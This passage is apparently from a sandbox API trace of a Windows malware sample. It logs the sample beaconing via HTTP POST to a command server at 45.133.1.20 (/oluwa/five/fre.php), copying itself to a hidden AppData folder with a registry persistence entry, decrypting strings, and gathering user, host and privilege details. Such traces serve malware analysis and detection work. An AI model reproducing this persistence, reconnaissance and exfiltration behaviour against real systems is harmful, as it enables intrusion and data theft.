0x6a0000 [0134.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3648 [0134.621] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19f930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f950 | out: ppResult=0x19f950*=0x6b3698*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0134.621] GetProcessHeap () returned 0x6a0000 [0134.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0134.621] socket (af=2, type=1, protocol=6) returned 0x25c [0134.621] connect (s=0x25c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0134.658] FreeAddrInfoW (pAddrInfo=0x6b3698*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0134.658] GetProcessHeap () returned 0x6a0000 [0134.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bba90 [0134.658] GetProcessHeap () returned 0x6a0000 [0134.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0134.659] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0134.660] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f958 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0134.660] GetProcessHeap () returned 0x6a0000 [0134.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbb18 [0134.660] GetProcessHeap () returned 0x6a0000 [0134.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0134.660] GetProcessHeap () returned 0x6a0000 [0134.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0134.660] GetProcessHeap () returned 0x6a0000 [0134.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0134.661] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0134.662] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f958 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 186\r\nConnection: close\r\n\r\n") returned 242 [0134.662] GetProcessHeap () returned 0x6a0000 [0134.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbbd8 [0134.662] GetProcessHeap () returned 0x6a0000 [0134.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0134.662] send (s=0x25c, buf=0x6bbbd8*, len=242, flags=0) returned 242 [0134.663] send (s=0x25c, buf=0x6bf370*, len=186, flags=0) returned 186 [0134.663] GetProcessHeap () returned 0x6a0000 [0134.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c2708 [0134.663] recv (in: s=0x25c, buf=0x6c2708, len=4048, flags=0 | out: buf=0x6c2708*) returned 196 [0134.740] GetProcessHeap () returned 0x6a0000 [0134.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbbd8 | out: hHeap=0x6a0000) returned 1 [0134.741] GetProcessHeap () returned 0x6a0000 [0134.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0134.741] GetProcessHeap () returned 0x6a0000 [0134.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbb18 | out: hHeap=0x6a0000) returned 1 [0134.741] GetProcessHeap () returned 0x6a0000 [0134.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bba90 | out: hHeap=0x6a0000) returned 1 [0134.742] closesocket (s=0x25c) returned 0 [0134.743] GetProcessHeap () returned 0x6a0000 [0134.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0134.743] GetProcessHeap () returned 0x6a0000 [0134.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd1c8 | out: hHeap=0x6a0000) returned 1 [0134.743] GetProcessHeap () returned 0x6a0000 [0134.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0134.743] GetProcessHeap () returned 0x6a0000 [0134.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3648 | out: hHeap=0x6a0000) returned 1 [0134.744] GetProcessHeap () returned 0x6a0000 [0134.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0134.744] GetProcessHeap () returned 0x6a0000 [0134.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 [0134.745] GetProcessHeap () returned 0x6a0000 [0134.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bead8 | out: hHeap=0x6a0000) returned 1 [0134.745] GetProcessHeap () returned 0x6a0000 [0134.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0134.745] GetProcessHeap () returned 0x6a0000 [0134.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0134.745] GetProcessHeap () returned 0x6a0000 [0134.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0134.746] GetProcessHeap () returned 0x6a0000 [0134.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bd1c8 [0134.747] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6bd1c8, nSize=0x103 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\cbgsujmwws.exe")) returned 0x33 [0134.747] GetProcessHeap () returned 0x6a0000 [0134.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bb998 [0134.748] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0134.749] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6bb998 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0134.749] GetProcessHeap () returned 0x6a0000 [0134.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f58) returned 0x6c2708 [0134.751] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0134.752] wvsprintfW (in: param_1=0x6c2708, param_2="%s\\%s\\%s.exe", arglist=0x19fd44 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 55 [0134.752] GetProcessHeap () returned 0x6a0000 [0134.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x72) returned 0x6b8560 [0134.752] GetProcessHeap () returned 0x6a0000 [0134.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0134.753] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0134.754] StrStrW (lpFirst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 0x0 [0134.755] GetProcessHeap () returned 0x6a0000 [0134.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6c2708 [0134.755] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0134.759] wvsprintfW (in: param_1=0x6c2708, param_2="%s\\%s", arglist=0x19fd60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0134.759] GetProcessHeap () returned 0x6a0000 [0134.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5c) returned 0x6bcaf0 [0134.759] GetProcessHeap () returned 0x6a0000 [0134.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0134.762] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0134.776] MoveFileExW (lpExistingFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\cbgsujmwws.exe"), lpNewFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.exe"), dwFlags=0x1) returned 1 [0134.780] GetProcessHeap () returned 0x6a0000 [0134.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bbba8 [0134.781] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0134.781] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6bbba8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0134.781] GetProcessHeap () returned 0x6a0000 [0134.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6c2708 [0134.782] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0134.783] wvsprintfW (in: param_1=0x6c2708, param_2="%s\\%s", arglist=0x19fb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0134.783] GetProcessHeap () returned 0x6a0000 [0134.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5c) returned 0x6bbdb8 [0134.783] GetProcessHeap () returned 0x6a0000 [0134.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0134.784] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0134.785] GetProcessHeap () returned 0x6a0000 [0134.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f50) returned 0x6c2708 [0134.785] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0134.786] wvsprintfW (in: param_1=0x6c2708, param_2="%s\\%s.%s", arglist=0x19fb5c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 55 [0134.786] GetProcessHeap () returned 0x6a0000 [0134.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x72) returned 0x6b8b60 [0134.786] GetProcessHeap () returned 0x6a0000 [0134.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0134.787] GetProcessHeap () returned 0x6a0000 [0134.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbdb8 | out: hHeap=0x6a0000) returned 1 [0134.788] GetProcessHeap () returned 0x6a0000 [0134.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbba8 | out: hHeap=0x6a0000) returned 1 [0134.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.794] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fcfc, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fd04 | out: pSid=0x19fd04*=0x6beb08*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0134.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.795] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x6beb08*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fd08 | out: IsMember=0x19fd08) returned 1 [0134.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.797] GetProcessHeap () returned 0x6a0000 [0134.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x6bbba8 [0134.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.798] CryptAcquireContextW (in: phProv=0x19fc94, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fc94*=0x0) returned 1 [0134.830] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.831] CryptAcquireContextW (in: phProv=0x19fc94, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fc94*=0x6bbc10) returned 1 [0134.860] GetProcessHeap () returned 0x6a0000 [0134.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0b80 [0134.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.862] CryptImportKey (in: hProv=0x6bbc10, pbData=0x6b0b80, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fc98 | out: phKey=0x19fc98*=0x6ad4e0) returned 1 [0134.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.863] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fc90*=0x1, dwFlags=0x0) returned 1 [0134.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.864] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418844, dwFlags=0x0) returned 1 [0134.864] GetProcessHeap () returned 0x6a0000 [0134.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0b80 | out: hHeap=0x6a0000) returned 1 [0134.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.866] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6bbba8, pdwDataLen=0x19fce8 | out: pbData=0x6bbba8, pdwDataLen=0x19fce8) returned 1 [0134.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.867] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0134.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.867] CryptReleaseContext (hProv=0x6bbc10, dwFlags=0x0) returned 1 [0134.868] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6bbba8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0134.869] GetProcessHeap () returned 0x6a0000 [0134.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x36) returned 0x6ad060 [0134.871] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6bbba8, cbMultiByte=-1, lpWideCharStr=0x6ad060, cchWideChar=27 | out: lpWideCharStr="�����������А����Й���Й��я��") returned 27 [0134.872] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0134.873] SHRegSetPathW (hKey=0x80000002, pcszSubKey="�����������А����Й���Й��я��", pcszValue="9EDDE9", pcszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe", dwFlags=0x0) returned 0x57 [0134.876] GetProcessHeap () returned 0x6a0000 [0134.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ad060 | out: hHeap=0x6a0000) returned 1 [0134.877] GetProcessHeap () returned 0x6a0000 [0134.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbba8 | out: hHeap=0x6a0000) returned 1 [0134.877] GetProcessHeap () returned 0x6a0000 [0134.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8b60 | out: hHeap=0x6a0000) returned 1 [0134.879] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe", dwFileAttributes=0x2006) returned 1 [0134.881] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9", dwFileAttributes=0x2006) returned 1 [0134.882] GetProcessHeap () returned 0x6a0000 [0134.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bcaf0 | out: hHeap=0x6a0000) returned 1 [0134.882] GetProcessHeap () returned 0x6a0000 [0134.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8560 | out: hHeap=0x6a0000) returned 1 [0134.883] GetProcessHeap () returned 0x6a0000 [0134.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb998 | out: hHeap=0x6a0000) returned 1 [0134.884] GetProcessHeap () returned 0x6a0000 [0134.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2bc) returned 0x6bb998 [0134.884] GetProcessHeap () returned 0x6a0000 [0134.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6bead8 [0134.884] GetProcessHeap () returned 0x6a0000 [0134.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11c) returned 0x6bbc60 [0134.885] RtlGetVersion (in: lpVersionInformation=0x6bbc60 | out: lpVersionInformation=0x6bbc60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0134.885] GetProcessHeap () returned 0x6a0000 [0134.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0134.886] GetProcessHeap () returned 0x6a0000 [0134.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bbc60 [0134.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.887] GetUserNameW (in: lpBuffer=0x6bbc60, pcbBuffer=0x19fed0 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fed0) returned 1 [0134.888] GetProcessHeap () returned 0x6a0000 [0134.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0134.889] GetProcessHeap () returned 0x6a0000 [0134.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bbc60 [0134.889] GetComputerNameW (in: lpBuffer=0x6bbc60, nSize=0x19fed0 | out: lpBuffer="XC64ZB", nSize=0x19fed0) returned 1 [0134.889] GetProcessHeap () returned 0x6a0000 [0134.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0134.890] GetCurrentThread () returned 0xfffffffe [0134.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.895] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x19fed0 | out: TokenHandle=0x19fed0*=0x0) returned 0 [0134.895] GetLastError () returned 0x3f0 [0134.895] GetCurrentProcess () returned 0xffffffff [0134.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.904] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fed0 | out: TokenHandle=0x19fed0*=0x258) returned 1 [0134.904] GetProcessHeap () returned 0x6a0000 [0134.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bbc60 [0134.905] GetProcessHeap () returned 0x6a0000 [0134.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bbe70 [0134.906] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.907] GetTokenInformation (in: TokenHandle=0x258, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19fecc | out: TokenInformation=0x0, ReturnLength=0x19fecc) returned 0 [0134.907] GetProcessHeap () returned 0x6a0000 [0134.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0134.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.908] GetTokenInformation (in: TokenHandle=0x258, TokenInformationClass=0x1, TokenInformation=0x6b0af0, TokenInformationLength=0x24, ReturnLength=0x19fecc | out: TokenInformation=0x6b0af0, ReturnLength=0x19fecc) returned 1 [0134.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.910] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x6b0af8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x6bbc60, cchName=0x19febc, ReferencedDomainName=0x6bbe70, cchReferencedDomainName=0x19fec0, peUse=0x19feb8 | out: Name="RDhJ0CNFevzX", cchName=0x19febc, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0x19fec0, peUse=0x19feb8) returned 1 [0134.912] GetProcessHeap () returned 0x6a0000 [0134.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f44) returned 0x6c2708 [0134.913] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0134.914] wvsprintfW (in: param_1=0x6c2708, param_2="%s", arglist=0x19fea8 | out: param_1="XC64ZB") returned 6 [0134.914] GetProcessHeap () returned 0x6a0000 [0134.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0134.914] GetProcessHeap () returned 0x6a0000 [0134.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0134.914] GetProcessHeap () returned 0x6a0000 [0134.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0134.915] CloseHandle (hObject=0x258) returned 1 [0134.915] GetProcessHeap () returned 0x6a0000 [0134.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbe70 | out: hHeap=0x6a0000) returned 1 [0134.916] GetProcessHeap () returned 0x6a0000 [0134.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0134.916] GetProcessHeap () returned 0x6a0000 [0134.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0134.917] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0134.918] GetDesktopWindow () returned 0x10010 [0134.919] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0134.919] GetWindowRect (in: hWnd=0x10010, lpRect=0x19fec8 | out: lpRect=0x19fec8) returned 1 [0134.920] GetProcessHeap () returned 0x6a0000 [0134.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6baa30 [0134.920] GetProcessHeap () returned 0x6a0000 [0134.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0134.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.921] GetUserNameW (in: lpBuffer=0x19fcc8, pcbBuffer=0x19fed0 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fed0) returned 1 [0134.923] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x74d00000 [0134.924] GetProcAddress (hModule=0x74d00000, lpProcName="NetUserGetInfo") returned 0x6dc133a0 [0134.924] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0x19fed4 | out: bufptr=0x6b4c70*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0xbb525, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0134.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.941] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fec0, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fec8 | out: pSid=0x19fec8*=0x6beb50*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0135.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0135.099] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x6beb50*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fecc | out: IsMember=0x19fecc) returned 1 [0135.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0135.101] GetNativeSystemInfo (in: lpSystemInfo=0x19fea4 | out: lpSystemInfo=0x19fea4*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0135.101] GetProcessHeap () returned 0x6a0000 [0135.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0135.102] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0135.102] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0135.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0135.110] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bbc60) returned 1 [0135.122] GetProcessHeap () returned 0x6a0000 [0135.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0b80 [0135.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0135.123] CryptImportKey (in: hProv=0x6bbc60, pbData=0x6b0b80, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0135.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0135.124] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0135.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0135.126] 